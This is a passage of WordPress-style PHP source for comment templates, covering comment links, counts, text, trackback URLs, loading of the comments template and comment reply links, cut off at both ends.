if ( ! empty( $in_comment_loop ) ) {
$cpage = (int) get_query_var( 'cpage' );
} else {
// Requires a database hit, so we only do it when we can't figure out from context.
$cpage = get_page_of_comment( $comment->comment_ID, $args );
}
}
/*
* If the default page displays the oldest comments, the permalinks for comments on the default page
* do not need a 'cpage' query var.
*/
if ( 'oldest' === get_option( 'default_comments_page' ) && 1 === $cpage ) {
$cpage = '';
}
}
if ( $cpage && get_option( 'page_comments' ) ) {
if ( $wp_rewrite->using_permalinks() ) {
$comment_link = trailingslashit( $comment_link ) . $wp_rewrite->comments_pagination_base . '-' . $cpage;
} else {
$comment_link = add_query_arg( 'cpage', $cpage, $comment_link );
}
}
if ( $wp_rewrite->using_permalinks() ) {
$comment_link = user_trailingslashit( $comment_link, 'comment' );
}
$comment_link = $comment_link . '#comment-' . $comment->comment_ID;
/**
* Filters the returned single comment permalink.
*
* @since 2.8.0
* @since 4.4.0 Added the `$cpage` parameter.
*
* @see get_page_of_comment()
*
* @param string $comment_link The comment permalink with '#comment-$id' appended.
* @param WP_Comment $comment The current comment object.
* @param array $args An array of arguments to override the defaults.
* @param int $cpage The calculated 'cpage' value.
*/
return apply_filters( 'get_comment_link', $comment_link, $comment, $args, $cpage );
}
/**
* Retrieves the link to the current post comments.
*
* @since 1.5.0
*
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is global $post.
* @return string The link to the comments.
*/
function get_comments_link( $post = 0 ) {
$hash = get_comments_number( $post ) ? '#comments' : '#respond';
$comments_link = get_permalink( $post ) . $hash;
/**
* Filters the returned post comments permalink.
*
* @since 3.6.0
*
* @param string $comments_link Post comments permalink with '#comments' appended.
* @param int|WP_Post $post Post ID or WP_Post object.
*/
return apply_filters( 'get_comments_link', $comments_link, $post );
}
/**
* Displays the link to the current post comments.
*
* @since 0.71
*
* @param string $deprecated Not Used.
* @param string $deprecated_2 Not Used.
*/
function comments_link( $deprecated = '', $deprecated_2 = '' ) {
if ( ! empty( $deprecated ) ) {
_deprecated_argument( __FUNCTION__, '0.72' );
}
if ( ! empty( $deprecated_2 ) ) {
_deprecated_argument( __FUNCTION__, '1.3.0' );
}
echo esc_url( get_comments_link() );
}
/**
* Retrieves the amount of comments a post has.
*
* @since 1.5.0
*
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is the global `$post`.
* @return string|int If the post exists, a numeric string representing the number of comments
* the post has, otherwise 0.
*/
function get_comments_number( $post = 0 ) {
$post = get_post( $post );
$comments_number = $post ? $post->comment_count : 0;
$post_id = $post ? $post->ID : 0;
/**
* Filters the returned comment count for a post.
*
* @since 1.5.0
*
* @param string|int $comments_number A string representing the number of comments a post has, otherwise 0.
* @param int $post_id Post ID.
*/
return apply_filters( 'get_comments_number', $comments_number, $post_id );
}
/**
* Displays the language string for the number of comments the current post has.
*
* @since 0.71
* @since 5.4.0 The `$deprecated` parameter was changed to `$post`.
*
* @param string|false $zero Optional. Text for no comments. Default false.
* @param string|false $one Optional. Text for one comment. Default false.
* @param string|false $more Optional. Text for more than one comment. Default false.
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is the global `$post`.
*/
function comments_number( $zero = false, $one = false, $more = false, $post = 0 ) {
echo get_comments_number_text( $zero, $one, $more, $post );
}
/**
* Displays the language string for the number of comments the current post has.
*
* @since 4.0.0
* @since 5.4.0 Added the `$post` parameter to allow using the function outside of the loop.
*
* @param string|false $zero Optional. Text for no comments. Default false.
* @param string|false $one Optional. Text for one comment. Default false.
* @param string|false $more Optional. Text for more than one comment. Default false.
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is the global `$post`.
* @return string Language string for the number of comments a post has.
*/
function get_comments_number_text( $zero = false, $one = false, $more = false, $post = 0 ) {
$comments_number = (int) get_comments_number( $post );
if ( $comments_number > 1 ) {
if ( false === $more ) {
$comments_number_text = sprintf(
/* translators: %s: Number of comments. */
_n( '%s Comment', '%s Comments', $comments_number ),
number_format_i18n( $comments_number )
);
} else {
// % Comments
/*
* translators: If comment number in your language requires declension,
* translate this to 'on'. Do not translate into your own language.
*/
if ( 'on' === _x( 'off', 'Comment number declension: on or off' ) ) {
$text = preg_replace( '#<span class="screen-reader-text">.+?</span>#', '', $more );
$text = preg_replace( '/&.+?;/', '', $text ); // Remove HTML entities.
$text = trim( strip_tags( $text ), '% ' );
// Replace '% Comments' with a proper plural form.
if ( $text && ! preg_match( '/[0-9]+/', $text ) && str_contains( $more, '%' ) ) {
/* translators: %s: Number of comments. */
$new_text = _n( '%s Comment', '%s Comments', $comments_number );
$new_text = trim( sprintf( $new_text, '' ) );
$more = str_replace( $text, $new_text, $more );
if ( ! str_contains( $more, '%' ) ) {
$more = '% ' . $more;
}
}
}
$comments_number_text = str_replace( '%', number_format_i18n( $comments_number ), $more );
}
} elseif ( 0 === $comments_number ) {
$comments_number_text = ( false === $zero ) ? __( 'No Comments' ) : $zero;
} else { // Must be one.
$comments_number_text = ( false === $one ) ? __( '1 Comment' ) : $one;
}
/**
* Filters the comments count for display.
*
* @since 1.5.0
*
* @see _n()
*
* @param string $comments_number_text A translatable string formatted based on whether the count
* is equal to 0, 1, or 1+.
* @param int $comments_number The number of post comments.
*/
return apply_filters( 'comments_number', $comments_number_text, $comments_number );
}
/**
* Retrieves the text of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
* @since 5.4.0 Added 'In reply to %s.' prefix to child comments in comments feed.
*
* @see Walker_Comment::comment()
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the text.
* Default current comment.
* @param array $args Optional. An array of arguments. Default empty array.
* @return string The comment content.
*/
function get_comment_text( $comment_id = 0, $args = array() ) {
$comment = get_comment( $comment_id );
$comment_text = $comment->comment_content;
if ( is_comment_feed() && $comment->comment_parent ) {
$parent = get_comment( $comment->comment_parent );
if ( $parent ) {
$parent_link = esc_url( get_comment_link( $parent ) );
$name = get_comment_author( $parent );
$comment_text = sprintf(
/* translators: %s: Comment link. */
ent2ncr( __( 'In reply to %s.' ) ),
'<a href="' . $parent_link . '">' . $name . '</a>'
) . "\n\n" . $comment_text;
}
}
/**
* Filters the text of a comment.
*
* @since 1.5.0
*
* @see Walker_Comment::comment()
*
* @param string $comment_text Text of the comment.
* @param WP_Comment $comment The comment object.
* @param array $args An array of arguments.
*/
return apply_filters( 'get_comment_text', $comment_text, $comment, $args );
}
/**
* Displays the text of the current comment.
*
* @since 0.71
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @see Walker_Comment::comment()
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to print the text.
* Default current comment.
* @param array $args Optional. An array of arguments. Default empty array.
*/
function comment_text( $comment_id = 0, $args = array() ) {
$comment = get_comment( $comment_id );
$comment_text = get_comment_text( $comment, $args );
/**
* Filters the text of a comment to be displayed.
*
* @since 1.2.0
*
* @see Walker_Comment::comment()
*
* @param string $comment_text Text of the comment.
* @param WP_Comment|null $comment The comment object. Null if not found.
* @param array $args An array of arguments.
*/
echo apply_filters( 'comment_text', $comment_text, $comment, $args );
}
/**
* Retrieves the comment time of the current comment.
*
* @since 1.5.0
* @since 6.2.0 Added the `$comment_id` parameter.
*
* @param string $format Optional. PHP date format. Defaults to the 'time_format' option.
* @param bool $gmt Optional. Whether to use the GMT date. Default false.
* @param bool $translate Optional. Whether to translate the time (for use in feeds).
* Default true.
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the time.
* Default current comment.
* @return string The formatted time.
*/
function get_comment_time( $format = '', $gmt = false, $translate = true, $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( null === $comment ) {
return '';
}
$comment_date = $gmt ? $comment->comment_date_gmt : $comment->comment_date;
$_format = ! empty( $format ) ? $format : get_option( 'time_format' );
$comment_time = mysql2date( $_format, $comment_date, $translate );
/**
* Filters the returned comment time.
*
* @since 1.5.0
*
* @param string|int $comment_time The comment time, formatted as a date string or Unix timestamp.
* @param string $format PHP date format.
* @param bool $gmt Whether the GMT date is in use.
* @param bool $translate Whether the time is translated.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_time', $comment_time, $format, $gmt, $translate, $comment );
}
/**
* Displays the comment time of the current comment.
*
* @since 0.71
* @since 6.2.0 Added the `$comment_id` parameter.
*
* @param string $format Optional. PHP time format. Defaults to the 'time_format' option.
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to print the time.
* Default current comment.
*/
function comment_time( $format = '', $comment_id = 0 ) {
echo get_comment_time( $format, false, true, $comment_id );
}
/**
* Retrieves the comment type of the current comment.
*
* @since 1.5.0
* @since 4.4.0 Added the ability for `$comment_id` to also accept a WP_Comment object.
*
* @param int|WP_Comment $comment_id Optional. WP_Comment or ID of the comment for which to get the type.
* Default current comment.
* @return string The comment type.
*/
function get_comment_type( $comment_id = 0 ) {
$comment = get_comment( $comment_id );
if ( '' === $comment->comment_type ) {
$comment->comment_type = 'comment';
}
/**
* Filters the returned comment type.
*
* @since 1.5.0
* @since 4.1.0 The `$comment_id` and `$comment` parameters were added.
*
* @param string $comment_type The type of comment, such as 'comment', 'pingback', or 'trackback'.
* @param string $comment_id The comment ID as a numeric string.
* @param WP_Comment $comment The comment object.
*/
return apply_filters( 'get_comment_type', $comment->comment_type, $comment->comment_ID, $comment );
}
/**
* Displays the comment type of the current comment.
*
* @since 0.71
*
* @param string|false $comment_text Optional. String to display for comment type. Default false.
* @param string|false $trackback_text Optional. String to display for trackback type. Default false.
* @param string|false $pingback_text Optional. String to display for pingback type. Default false.
*/
function comment_type( $comment_text = false, $trackback_text = false, $pingback_text = false ) {
if ( false === $comment_text ) {
$comment_text = _x( 'Comment', 'noun' );
}
if ( false === $trackback_text ) {
$trackback_text = __( 'Trackback' );
}
if ( false === $pingback_text ) {
$pingback_text = __( 'Pingback' );
}
$type = get_comment_type();
switch ( $type ) {
case 'trackback':
echo $trackback_text;
break;
case 'pingback':
echo $pingback_text;
break;
default:
echo $comment_text;
}
}
/**
* Retrieves the current post's trackback URL.
*
* There is a check to see if permalink's have been enabled and if so, will
* retrieve the pretty path. If permalinks weren't enabled, the ID of the
* current post is used and appended to the correct page to go to.
*
* @since 1.5.0
*
* @return string The trackback URL after being filtered.
*/
function get_trackback_url() {
if ( get_option( 'permalink_structure' ) ) {
$trackback_url = trailingslashit( get_permalink() ) . user_trailingslashit( 'trackback', 'single_trackback' );
} else {
$trackback_url = get_option( 'siteurl' ) . '/wp-trackback.php?p=' . get_the_ID();
}
/**
* Filters the returned trackback URL.
*
* @since 2.2.0
*
* @param string $trackback_url The trackback URL.
*/
return apply_filters( 'trackback_url', $trackback_url );
}
/**
* Displays the current post's trackback URL.
*
* @since 0.71
*
* @param bool $deprecated_echo Not used.
* @return void|string Should only be used to echo the trackback URL, use get_trackback_url()
* for the result instead.
*/
function trackback_url( $deprecated_echo = true ) {
if ( true !== $deprecated_echo ) {
_deprecated_argument(
__FUNCTION__,
'2.5.0',
sprintf(
/* translators: %s: get_trackback_url() */
__( 'Use %s instead if you do not want the value echoed.' ),
'<code>get_trackback_url()</code>'
)
);
}
if ( $deprecated_echo ) {
echo get_trackback_url();
} else {
return get_trackback_url();
}
}
/**
* Generates and displays the RDF for the trackback information of current post.
*
* Deprecated in 3.0.0, and restored in 3.0.1.
*
* @since 0.71
*
* @param int|string $deprecated Not used (Was $timezone = 0).
*/
function trackback_rdf( $deprecated = '' ) {
if ( ! empty( $deprecated ) ) {
_deprecated_argument( __FUNCTION__, '2.5.0' );
}
if ( isset( $_SERVER['HTTP_USER_AGENT'] ) && false !== stripos( $_SERVER['HTTP_USER_AGENT'], 'W3C_Validator' ) ) {
return;
}
echo '<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/">
<rdf:Description rdf:about="';
the_permalink();
echo '"' . "\n";
echo ' dc:identifier="';
the_permalink();
echo '"' . "\n";
echo ' dc:title="' . str_replace( '--', '--', wptexturize( strip_tags( get_the_title() ) ) ) . '"' . "\n";
echo ' trackback:ping="' . get_trackback_url() . '"' . " />\n";
echo '</rdf:RDF>';
}
/**
* Determines whether the current post is open for comments.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 1.5.0
*
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default current post.
* @return bool True if the comments are open.
*/
function comments_open( $post = null ) {
$_post = get_post( $post );
$post_id = $_post ? $_post->ID : 0;
$comments_open = ( $_post && ( 'open' === $_post->comment_status ) );
/**
* Filters whether the current post is open for comments.
*
* @since 2.5.0
*
* @param bool $comments_open Whether the current post is open for comments.
* @param int $post_id The post ID.
*/
return apply_filters( 'comments_open', $comments_open, $post_id );
}
/**
* Determines whether the current post is open for pings.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 1.5.0
*
* @param int|WP_Post $post Optional. Post ID or WP_Post object. Default current post.
* @return bool True if pings are accepted
*/
function pings_open( $post = null ) {
$_post = get_post( $post );
$post_id = $_post ? $_post->ID : 0;
$pings_open = ( $_post && ( 'open' === $_post->ping_status ) );
/**
* Filters whether the current post is open for pings.
*
* @since 2.5.0
*
* @param bool $pings_open Whether the current post is open for pings.
* @param int $post_id The post ID.
*/
return apply_filters( 'pings_open', $pings_open, $post_id );
}
/**
* Displays form token for unfiltered comments.
*
* Will only display nonce token if the current user has permissions for
* unfiltered html. Won't display the token for other users.
*
* The function was backported to 2.0.10 and was added to versions 2.1.3 and
* above. Does not exist in versions prior to 2.0.10 in the 2.0 branch and in
* the 2.1 branch, prior to 2.1.3. Technically added in 2.2.0.
*
* Backported to 2.0.10.
*
* @since 2.1.3
*/
function wp_comment_form_unfiltered_html_nonce() {
$post = get_post();
$post_id = $post ? $post->ID : 0;
if ( current_user_can( 'unfiltered_html' ) ) {
wp_nonce_field( 'unfiltered-html-comment_' . $post_id, '_wp_unfiltered_html_comment_disabled', false );
wp_print_inline_script_tag( "(function(){if(window===window.parent){document.getElementById('_wp_unfiltered_html_comment_disabled').name='_wp_unfiltered_html_comment';}})();\n//# sourceURL=" . rawurlencode( __FUNCTION__ ) );
}
}
/**
* Loads the comment template specified in $file.
*
* Will not display the comments template if not on single post or page, or if
* the post does not have comments.
*
* Uses the WordPress database object to query for the comments. The comments
* are passed through the {@see 'comments_array'} filter hook with the list of comments
* and the post ID respectively.
*
* The `$file` path is passed through a filter hook called {@see 'comments_template'},
* which includes the template directory and $file combined. Tries the $filtered path
* first and if it fails it will require the default comment template from the
* default theme. If either does not exist, then the WordPress process will be
* halted. It is advised for that reason, that the default theme is not deleted.
*
* Will not try to get the comments if the post has none.
*
* @since 1.5.0
*
* @global WP_Query $wp_query WordPress Query object.
* @global WP_Post $post Global post object.
* @global wpdb $wpdb WordPress database abstraction object.
* @global int $id
* @global WP_Comment $comment Global comment object.
* @global string $user_login
* @global string $user_identity
* @global bool $overridden_cpage
* @global bool $withcomments
* @global string $wp_stylesheet_path Path to current theme's stylesheet directory.
* @global string $wp_template_path Path to current theme's template directory.
*
* @param string $file Optional. The file to load. Default '/comments.php'.
* @param bool $separate_comments Optional. Whether to separate the comments by comment type.
* Default false.
*/
function comments_template( $file = '/comments.php', $separate_comments = false ) {
global $wp_query, $withcomments, $post, $wpdb, $id, $comment, $user_login, $user_identity, $overridden_cpage, $wp_stylesheet_path, $wp_template_path;
if ( ! ( is_single() || is_page() || $withcomments ) || empty( $post ) ) {
return;
}
if ( empty( $file ) ) {
$file = '/comments.php';
}
$req = get_option( 'require_name_email' );
/*
* Comment author information fetched from the comment cookies.
*/
$commenter = wp_get_current_commenter();
/*
* The name of the current comment author escaped for use in attributes.
* Escaped by sanitize_comment_cookies().
*/
$comment_author = $commenter['comment_author'];
/*
* The email address of the current comment author escaped for use in attributes.
* Escaped by sanitize_comment_cookies().
*/
$comment_author_email = $commenter['comment_author_email'];
/*
* The URL of the current comment author escaped for use in attributes.
*/
$comment_author_url = esc_url( $commenter['comment_author_url'] );
$comment_args = array(
'orderby' => 'comment_date_gmt',
'order' => 'ASC',
'status' => 'approve',
'post_id' => $post->ID,
'no_found_rows' => false,
);
if ( get_option( 'thread_comments' ) ) {
$comment_args['hierarchical'] = 'threaded';
} else {
$comment_args['hierarchical'] = false;
}
if ( is_user_logged_in() ) {
$comment_args['include_unapproved'] = array( get_current_user_id() );
} else {
$unapproved_email = wp_get_unapproved_comment_author_email();
if ( $unapproved_email ) {
$comment_args['include_unapproved'] = array( $unapproved_email );
}
}
$per_page = 0;
if ( get_option( 'page_comments' ) ) {
$per_page = (int) get_query_var( 'comments_per_page' );
if ( 0 === $per_page ) {
$per_page = (int) get_option( 'comments_per_page' );
}
$comment_args['number'] = $per_page;
$page = (int) get_query_var( 'cpage' );
if ( $page ) {
$comment_args['offset'] = ( $page - 1 ) * $per_page;
} elseif ( 'oldest' === get_option( 'default_comments_page' ) ) {
$comment_args['offset'] = 0;
} else {
// If fetching the first page of 'newest', we need a top-level comment count.
$top_level_query = new WP_Comment_Query();
$top_level_args = array(
'count' => true,
'orderby' => false,
'post_id' => $post->ID,
'status' => 'approve',
);
if ( $comment_args['hierarchical'] ) {
$top_level_args['parent'] = 0;
}
if ( isset( $comment_args['include_unapproved'] ) ) {
$top_level_args['include_unapproved'] = $comment_args['include_unapproved'];
}
/**
* Filters the arguments used in the top level comments query.
*
* @since 5.6.0
*
* @see WP_Comment_Query::__construct()
*
* @param array $top_level_args {
* The top level query arguments for the comments template.
*
* @type bool $count Whether to return a comment count.
* @type string|array $orderby The field(s) to order by.
* @type int $post_id The post ID.
* @type string|array $status The comment status to limit results by.
* }
*/
$top_level_args = apply_filters( 'comments_template_top_level_query_args', $top_level_args );
$top_level_count = $top_level_query->query( $top_level_args );
$comment_args['offset'] = ( (int) ceil( $top_level_count / $per_page ) - 1 ) * $per_page;
}
}
/**
* Filters the arguments used to query comments in comments_template().
*
* @since 4.5.0
*
* @see WP_Comment_Query::__construct()
*
* @param array $comment_args {
* Array of WP_Comment_Query arguments.
*
* @type string|array $orderby Field(s) to order by.
* @type string $order Order of results. Accepts 'ASC' or 'DESC'.
* @type string $status Comment status.
* @type array $include_unapproved Array of IDs or email addresses whose unapproved comments
* will be included in results.
* @type int $post_id ID of the post.
* @type bool $no_found_rows Whether to refrain from querying for found rows.
* @type bool $update_comment_meta_cache Whether to prime cache for comment meta.
* @type bool|string $hierarchical Whether to query for comments hierarchically.
* @type int $offset Comment offset.
* @type int $number Number of comments to fetch.
* }
*/
$comment_args = apply_filters( 'comments_template_query_args', $comment_args );
$comment_query = new WP_Comment_Query( $comment_args );
$_comments = $comment_query->comments;
// Trees must be flattened before they're passed to the walker.
if ( $comment_args['hierarchical'] ) {
$comments_flat = array();
foreach ( $_comments as $_comment ) {
$comments_flat[] = $_comment;
$comment_children = $_comment->get_children(
array(
'format' => 'flat',
'status' => $comment_args['status'],
'orderby' => $comment_args['orderby'],
)
);
foreach ( $comment_children as $comment_child ) {
$comments_flat[] = $comment_child;
}
}
} else {
$comments_flat = $_comments;
}
/**
* Filters the comments array.
*
* @since 2.1.0
*
* @param array $comments Array of comments supplied to the comments template.
* @param int $post_id Post ID.
*/
$wp_query->comments = apply_filters( 'comments_array', $comments_flat, $post->ID );
$comments = &$wp_query->comments;
$wp_query->comment_count = count( $wp_query->comments );
$wp_query->max_num_comment_pages = $comment_query->max_num_pages;
if ( $separate_comments ) {
$wp_query->comments_by_type = separate_comments( $comments );
$comments_by_type = &$wp_query->comments_by_type;
} else {
$wp_query->comments_by_type = array();
}
$overridden_cpage = false;
if ( '' === get_query_var( 'cpage' ) && $wp_query->max_num_comment_pages > 1 ) {
set_query_var( 'cpage', 'newest' === get_option( 'default_comments_page' ) ? get_comment_pages_count() : 1 );
$overridden_cpage = true;
}
if ( ! defined( 'COMMENTS_TEMPLATE' ) ) {
define( 'COMMENTS_TEMPLATE', true );
}
$theme_template = trailingslashit( $wp_stylesheet_path ) . $file;
/**
* Filters the path to the theme template file used for the comments template.
*
* @since 1.5.1
*
* @param string $theme_template The path to the theme template file.
*/
$include = apply_filters( 'comments_template', $theme_template );
if ( file_exists( $include ) ) {
require $include;
} elseif ( file_exists( trailingslashit( $wp_template_path ) . $file ) ) {
require trailingslashit( $wp_template_path ) . $file;
} else { // Backward compat code will be removed in a future release.
require ABSPATH . WPINC . '/theme-compat/comments.php';
}
}
/**
* Displays the link to the comments for the current post ID.
*
* @since 0.71
*
* @param false|string $zero Optional. String to display when no comments. Default false.
* @param false|string $one Optional. String to display when only one comment is available. Default false.
* @param false|string $more Optional. String to display when there are more than one comment. Default false.
* @param string $css_class Optional. CSS class to use for comments. Default empty.
* @param false|string $none Optional. String to display when comments have been turned off. Default false.
*/
function comments_popup_link( $zero = false, $one = false, $more = false, $css_class = '', $none = false ) {
$post_id = get_the_ID();
$post_title = get_the_title();
$comments_number = (int) get_comments_number( $post_id );
if ( false === $zero ) {
/* translators: %s: Post title. */
$zero = sprintf( __( 'No Comments<span class="screen-reader-text"> on %s</span>' ), $post_title );
}
if ( false === $one ) {
/* translators: %s: Post title. */
$one = sprintf( __( '1 Comment<span class="screen-reader-text"> on %s</span>' ), $post_title );
}
if ( false === $more ) {
/* translators: 1: Number of comments, 2: Post title. */
$more = _n(
'%1$s Comment<span class="screen-reader-text"> on %2$s</span>',
'%1$s Comments<span class="screen-reader-text"> on %2$s</span>',
$comments_number
);
$more = sprintf( $more, number_format_i18n( $comments_number ), $post_title );
}
if ( false === $none ) {
/* translators: %s: Post title. */
$none = sprintf( __( 'Comments Off<span class="screen-reader-text"> on %s</span>' ), $post_title );
}
if ( 0 === $comments_number && ! comments_open() && ! pings_open() ) {
printf(
'<span%1$s>%2$s</span>',
! empty( $css_class ) ? ' class="' . esc_attr( $css_class ) . '"' : '',
$none
);
return;
}
if ( post_password_required() ) {
_e( 'Enter your password to view comments.' );
return;
}
if ( 0 === $comments_number ) {
$respond_link = get_permalink() . '#respond';
/**
* Filters the respond link when a post has no comments.
*
* @since 4.4.0
*
* @param string $respond_link The default response link.
* @param int $post_id The post ID.
*/
$comments_link = apply_filters( 'respond_link', $respond_link, $post_id );
} else {
$comments_link = get_comments_link();
}
$link_attributes = '';
/**
* Filters the comments link attributes for display.
*
* @since 2.5.0
*
* @param string $link_attributes The comments link attributes. Default empty.
*/
$link_attributes = apply_filters( 'comments_popup_link_attributes', $link_attributes );
printf(
'<a href="%1$s"%2$s%3$s>%4$s</a>',
esc_url( $comments_link ),
! empty( $css_class ) ? ' class="' . $css_class . '" ' : '',
$link_attributes,
get_comments_number_text( $zero, $one, $more )
);
}
/**
* Retrieves HTML content for reply to comment link.
*
* @since 2.7.0
* @since 4.4.0 Added the ability for `$comment` to also accept a WP_Comment object.
*
* @param array $args {
* Optional. Override default arguments.
*
* @type string $add_below The first part of the selector used to identify the comment to respond below.
* The resulting value is passed as the first parameter to addComment.moveForm(),
* concatenated as $add_below-$comment->comment_ID. Default 'comment'.
* @type string $respond_id The selector identifying the responding comment. Passed as the third parameter
* to addComment.moveForm(), and appended to the link URL as a hash value.
* Default 'respond'.
* @type string $reply_text The visible text of the Reply link. Default 'Reply'.
* @type string $reply_to_text The accessible name of the Reply link, using `%s` as a placeholder
* for the comment author's name. Default 'Reply to %s'.
* Should start with the visible `reply_text` value.
* @type bool $show_reply_to_text Whether to use `reply_to_text` as visible link text. Default false.
* @type string $login_text The text of the link to reply if logged out. Default 'Log in to Reply'.
* @type int $max_depth The max depth of the comment tree. Default 0.
* @type int $depth The depth of the new comment. Must be greater than 0 and less than the value
* of the 'thread_comments_depth' option set in Settings > Discussion. Default 0.
* @type string $before The text or HTML to add before the reply link. Default empty.
* @type string $after The text or HTML to add after the reply link. Default empty.
* }
* @param int|WP_Comment $comment Optional. Comment being replied to. Default current comment.
* @param int|WP_Post $post Optional. Post ID or WP_Post object the comment is going to be displayed on.
* Default current post.
* @return string|false|null Link to show comment form on success. False if comments are closed. Null on failure.
*/
function get_comment_reply_link( $args = array(), $comment = null, $post = null ) {
$defaults = array(
'add_below' => 'comment',
'respond_id' => 'respond',
'reply_text' => __( 'Reply' ),
/* translators: Comment reply button text. %s: Comment author name. */
'reply_to_text' => __( 'Reply to %s' ),
'login_text' => __( 'Log in to Reply' ),
'max_depth' => 0,
'depth' => 0,
'before' => '',
'after' => '',
'show_reply_to_text' => false,
);
$args = wp_parse_args( $args, $defaults );
$args['max_depth'] = (int) $args['max_depth'];
$args['depth'] = (int) $args['depth'];
if ( 0 === $args['depth'] || $args['max_depth'] <= $args['depth'] ) {
return null;
}
$comment = get_comment( $comment );
if ( empty( $comment ) ) {
return null;
}
if ( empty( $post ) ) {
$post = $comment->comment_post_ID;
}
$post = get_post( $post );
if ( ! comments_open( $post->ID ) ) {
return false;
}
if ( get_option( 'page_comments' ) ) {
$permalink = str_replace( '#comment-' . $comment->comment_ID, '', get_comment_link( $comment ) );
} else {
$permalink = get_permalink( $post->ID );
}
/**
* Filters the comment reply link arguments.
*
* @since 4.1.0
*
* @param array $args Comment reply link arguments. See get_comment_reply_link()
* for more information on accepted arguments.
* @param WP_Comment $comment The object of the comment being replied to.
* @param WP_Post $post The WP_Post object.
*/
$args = apply_filters( 'comment_reply_link_args', $args, $comment, $post );
if ( get_option( 'comment_registration' ) && ! is_user_logged_in() ) {
$link = sprintf(
'<a rel="nofollow" class="comment-reply-login" href="%s">%s</a>',
esc_url( wp_login_url( get_permalink() ) ),
$args['login_text']
);
} else {
$data_attributes = array(
'commentid' => $comment->comment_ID,
'postid' => $post->ID,
'belowelement' => $args['add_below'] . '-' . $comment->comment_ID,
'respondelement' => $args['respond_id'],
'replyto' => sprintf( $args['reply_to_text'], get_comment_author( $comment ) ),
);
$data_attribute_string = '';
foreach ( $data_attributes as $name => $value ) {
$data_attribute_string .= " data-{$name}=\"" . esc_attr( $value ) . '"';
}
$data_attribute_string = trim( $data_attribute_string );
$reply_text = $args['show_reply_to_text']
? sprintf( $args['reply_to_text'], get_comment_author( $comment ) )
: $args['reply_text'];
$aria_label = $args['show_reply_to_text'] ? '' : sprintf( $args['reply_to_text'], get_comment_author( $comment ) );
$link = sprintf(
'<a rel="nofollow" class="comment-reply-link" href="%s" %s%s>%s</a>',
esc_url(
add_query_arg(
array(
'replytocom' => $comment->comment_ID,
'unapproved' => false,
'moderation-hash' => false,
),
$permalink
)
) . '#' . $args['respond_id'],
$data_attribute_string,
$aria_label ? ' aria-label="' . esc_attr( $aria_label ) . '"' : '',
$reply_text
);
}
$comment_reply_link = $args['before'] . $link . $args['after'];
/**
* Filters the comment reply link.
*
* @since 2.7.0
*
* @param string $comment_reply_link The HTML markup for the comment reply link.
* @param array $args An array of arguments overriding the defaults.
* @param WP_Comment $comment The object of the comment being replied.
* @param WP_Post $post The WP_Post object.
*/
return apply_filters( 'comment_reply_link', $comment_reply_link, $args, $comment, $post );
}
/**
* Displays the HTML content for reply to comment link.
*
* @since 2.7.0
*
* @see get_comment_reply_link()
*
* @param array $args Optional. Override default options. Default empty array.
* @param int|WP_Comment $comment Optional. Comment being replied to. Default current comment.
* @param int|WP_Post $post Optional. Post ID or WP_Post object the comment is going to be displayed on.
* Default current post.
*/
function comment_reply_link( $args = array(), $comment = null, $post = null ) {
echo get_comment_reply_link( $args, $comment, $post );
}
/**
* Retrieves HTML content for reply to post link.
*
* @since 2.7.0
*
* @param array $args {
* Optional. Override default arguments.
*
* @type string $add_below The first part of the selector used to identify the comment to respond below.
* The resulting value is passed as the first parameter to addComment.moveForm(),
* concatenated as $add_below-$comment->comment_ID. Default is 'post'.
* @type string $respond_id The selector identifying the responding comment. Passed as the third parameter
* to addComment.moveForm(), and appended to the link URL as a hash value.
* Default 'respond'.
* @type string $reply_text Text of the Reply link. Default is 'Leave a Comment'.
* @type string $login_text Text of the link to reply if logged out. Default is 'Log in to leave a Comment'.
* @type string $before Text or HTML to add before the reply link. Default empty.
* @type string $after Text or HTML to add after the reply link. Default empty.
* }
* @param int|WP_Post $post Optional. Post ID or WP_Post object the comment is going to be displayed on.
* Default current post.
* @return string|false Link to show comment form on success. False if comments are closed.
*/
function get_post_reply_link( $args = array(), $post = null ) {
$defaults = array(
'add_below' => 'post',
'respond_id' => 'respond',
'reply_text' => __( 'Leave a Comment' ),
'login_text' => __( 'Log in to leave a Comment' ),
'before' => '',
'after' => '',
);
$args = wp_parse_args( $args, $defaults );
$post = get_post( $post );
if ( ! comments_open( $post->ID ) ) {
return false;
}
if ( get_option( 'comment_registration' ) && ! is_user_logged_in() ) {
$link = sprintf(
'<a rel="nofollow" class="comment-reply-login" href="%s">%s</a>',
wp_login_url( get_permalink() ),
$args['login_text']
);
} else {
$onclick = sprintf(
'return addComment.moveForm( "%1$s-%2$s", "0", "%3$s", "%2$s" )',
$args['add_below'],
$post->ID,
$args['respond_id']
);
$link = sprintf(
"<a rel='nofollow' class='comment-reply-link' href='%s' onclick='%s'>%s</a>",
get_permalink( $post->ID ) . '#' . $args['respond_id'],
$onclick,
$args['reply_text']
);
}
$post_reply_link = $args['before'] . $link . $args['after'];
/**
* Filters the formatted post comments link HTML.
*
* @since 2.7.0
*
* @param string $post_reply_link The HTML-formatted post comments link.
* @param int|WP_Post $post The post ID or WP_Post object.
*/
return apply_filters( 'post_comments_link', $post_reply_link, $post );
}
/**
* Displays the HTML content for reply to post link.
*
* @since 2.7.0
*
* @see get_post_reply_link()
*
* @param array $args Optional. Override default options. Default empty array.
